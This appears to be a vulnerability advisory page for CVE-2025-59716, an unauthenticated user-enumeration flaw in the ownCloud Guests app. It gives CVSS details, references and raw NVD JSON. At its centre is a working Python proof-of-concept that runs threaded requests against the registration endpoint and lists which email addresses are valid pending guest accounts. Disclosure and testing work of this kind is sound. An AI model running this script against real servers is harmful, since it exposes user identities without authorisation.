CVE-2025-59716

Description

ownCloud Guests before 0.12.5 allows unauthenticated user enumeration via the /apps/guests/register/{email}/{token} endpoint. Because of insufficient validation of the supplied token in showPasswordForm, the server responds differently when an e-mail address corresponds to a valid pending guest user rather than a non-existent user.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:owncloud:guests:*:*:*:*:*:*:*:* - VULNERABLE

ownCloud Guests < 0.12.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 # CVE-2025-59716 PoC - ownCloud Guests User Enumeration # Description: Unauthenticated user enumeration via /apps/guests/register/{email}/{token} endpoint import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed def check_user_enumeration(base_url, email, token="invalid_token"): """ Check if email corresponds to a valid pending guest user. Returns True if user exists (different response), False otherwise. """ url = f"{base_url}/apps/guests/register/{email}/{token}" try: response = requests.get(url, timeout=10, allow_redirects=False) # Valid guest user typically returns 200 with password form # Invalid user returns 404, 302, or different content if response.status_code == 200 and "password" in response.text.lower(): return True return False except requests.RequestException as e: print(f"[!] Error checking {email}: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-59716.py <target_url> [email_list]") print("Example: python cve-2025-59716.py https://vulnerable-server.com emails.txt") sys.exit(1) base_url = sys.argv[1].rstrip('/') email_list = sys.argv[2] if len(sys.argv) > 2 else None # Test emails test_emails = [ "[email protected]", "[email protected]", "[email protected]" ] if email_list: try: with open(email_list, 'r') as f: test_emails = [line.strip() for line in f if line.strip()] except IOError as e: print(f"[!] Failed to read email list: {e}") print(f"[*] Testing {len(test_emails)} emails against {base_url}") print("[*] Looking for valid pending guest users...\n") found_users = [] with ThreadPoolExecutor(max_workers=10) as executor: futures = {executor.submit(check_user_enumeration, base_url, email): email for email in test_emails} for future in as_completed(futures): email = futures[future] try: if future.result(): print(f"[+] VALID USER FOUND: {email}") found_users.append(email) except Exception as e: print(f"[!] Exception for {email}: {e}") print(f"\n[*] Scan complete. Found {len(found_users)} valid guest user(s).") if found_users: print("[*] Valid emails:") for email in found_users: print(f" - {email}") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59716
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59716
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59716/
[4] VulDB https://vuldb.com/cve/CVE-2025-59716
[5] https://gist.github.com/thesmartshadow/64ae0449e909174d0479a4f23657147f
[6] https://github.com/owncloud/guests
[7] https://marketplace.owncloud.com/apps/guests
[8] https://yeswehack.com/reports/411806

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59716", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:44.800", "lastModified": "2026-01-07T17:05:23.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ownCloud Guests before 0.12.5 allows unauthenticated user enumeration via the /apps/guests/register/{email}/{token} endpoint. Because of insufficient validation of the supplied token in showPasswordForm, the server responds differently when an e-mail address corresponds to a valid pending guest user rather than a non-existent user."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:owncloud:guests:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.12.4", "matchCriteriaId": "0CE375CB-E61A-4CDF-B946-356DD0A799A6"}]}]}], "references": [{"url": "https://gist.github.com/thesmartshadow/64ae0449e909174d0479a4f23657147f", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/owncloud/guests", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://marketplace.owncloud.com/apps/guests", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://yeswehack.com/reports/411806", "source": "[email protected]", "tags": ["Permissions Required"]}]}}